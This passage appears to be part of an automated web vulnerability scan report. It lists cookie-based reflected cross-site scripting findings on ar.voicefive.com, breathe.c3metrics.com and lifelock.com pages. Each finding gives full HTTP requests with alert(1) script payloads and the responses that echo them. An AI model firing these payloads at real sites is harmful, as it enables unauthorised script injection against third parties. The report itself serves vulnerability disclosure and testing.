MX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p97174789": 'exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&', "BMX_3PC": '132dd0<script>alert(1)</script>545950acd64', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };

...[SNIP]...

5.89. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 299e3<script>alert(1)</script>04ee78f4696 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=194941096 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C299e3<script>alert(1)</script>04ee78f4696

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:30:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=3&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:30:17 2011&prad=253732016&arc=194941096&; expires=Sat 23-Jul-2011 12:30:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24957

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"194941096",Location:
...[SNIP]...
s={ "ar_p97174789": 'exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:25:50 2011&prad=256163694&arc=202065971&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303647950%2E016%2Cwait%2D%3E10000%2C299e3<script>alert(1)</script>04ee78f4696', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Bro
...[SNIP]...

5.90. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 14ebe<script>alert(1)</script>6914188f971 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-130334904614ebe<script>alert(1)</script>6914188f971

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:10:02 2011&recExp=Sun Apr 24 12:10:02 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:10:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303647002; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24741

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-130334904614ebe<script>alert(1)</script>6914188f971', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

5.91. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 23ca7<script>alert(1)</script>3d772f731c6 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&23ca7<script>alert(1)</script>3d772f731c6; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:10:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:10:00 2011&recExp=Sun Apr 24 12:10:00 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:10:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303647000; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24741

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...
ull};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&23ca7<script>alert(1)</script>3d772f731c6' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

5.92. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload c4fd8<script>alert(1)</script>77954a0fecc was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163694&AR_C=202065971 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&c4fd8<script>alert(1)</script>77954a0fecc; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:29:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=2&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:29:11 2011&c4fd8<script>alert(1)</script>77954a0fecc=&prad=256163694&arc=202065971&; expires=Sat 23-Jul-2011 12:29:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303648151; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24862

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163694",Pid:"p97174789",Arc:"202065971",Location:
...[SNIP]...
.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&c4fd8<script>alert(1)</script>77954a0fecc', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig=
...[SNIP]...

5.93. http://breathe.c3metrics.com/c3realview.js [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://breathe.c3metrics.com
Path:   /c3realview.js

Issue detail

The value of the C3UID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 372b9'%3balert(1)//28e517d2070 was submitted in the C3UID cookie. This input was echoed as 372b9';alert(1)//28e517d2070 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803372b9'%3balert(1)//28e517d2070; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:42 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-Length: 9648

(function(){c3CTJS={c3CTVersion:{vNo:'5.1.0'},c3CJS:{c3CJScampignId:'480',c3CJSdomain:null,c3VJSuid:'13014572191303613803372b9';alert(1)//28e517d2070',c3VJSnuid:'',c3CJSnetwork:'1',c3CJSOrganic:1,c3CJSOrganicQ:2,c3CJSlenSet:2,c3CJSSPlitchar:"-",c3CJSSearchString:null,c3CJSqueryVar:new Array(),c3CJSvtImg:"/1.gif",c3thisFileName:'c3metrics.php',c3CJS
...[SNIP]...

5.94. http://www.lifelock.com/about/leadership/management/ [LifeLockEnrollment cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/leadership/management/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c606"><script>alert(1)</script>44823d22b35 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/leadership/management/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.3.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH131c606"><script>alert(1)</script>44823d22b35; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/36

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:06 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=e26e4dc493f4a4caf15b4aaabe78cd2f3ec073d706939dfc4db3979a; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18362

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch131c606"><script>alert(1)</script>44823d22b35" class="enroll-now">
...[SNIP]...

5.95. http://www.lifelock.com/about/lifelock-in-the-community/ [LifeLockEnrollment cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f44"><script>alert(1)</script>cf60dea9c5 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/lifelock-in-the-community/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=3e9d64599ec3dc11eab7f4125fe101c63ec073d706939dfc4db392a6; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH1319f44"><script>alert(1)</script>cf60dea9c5; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:22:59 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=bbb4c353da958a49066e32345fe550473ec073d706939dfc4db39793; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 16031

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1319f44"><script>alert(1)</script>cf60dea9c5" class="enroll-now">
...[SNIP]...

5.96. http://www.lifelock.com/guarantee/ [LifeLockEnrollment cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /guarantee/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94aa7"><script>alert(1)</script>167524f77ad was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /guarantee/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; LifeLockEnrollment=promoCode=GOOGSEARCH1394aa7"><script>alert(1)</script>167524f77ad; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/54

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:21:36 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=66a7695384996248881c6a8ba7494b0a3ec073d706939dfc4db39740; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13412

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1394aa7"><script>alert(1)</script>167524f77ad" class="enroll-now">
...[SNIP]...

5.97. http://www.lifelock.com/how-it-works/ [LifeLockEnrollment cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /how-it-works/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bdd"><script>alert(1)</script>b0ca6746d39 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /how-it-works/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13e3bdd"><script>alert(1)</script>b0ca6746d39; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:37 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=4e6b2ce904419aa4e205c488d5ec5cb83ec073d706939dfc4db397b9; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 12713

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch13e3bdd"><script>alert(1)</script>b0ca6746d39" class="enroll-now">
...[SNIP]...

5.98. http://www.lifelock.com/identity-theft/ [LifeLockEnrollment cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /identity-theft/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58800"><script>alert(1)</script>8aee1f6f841 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /identity-theft/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
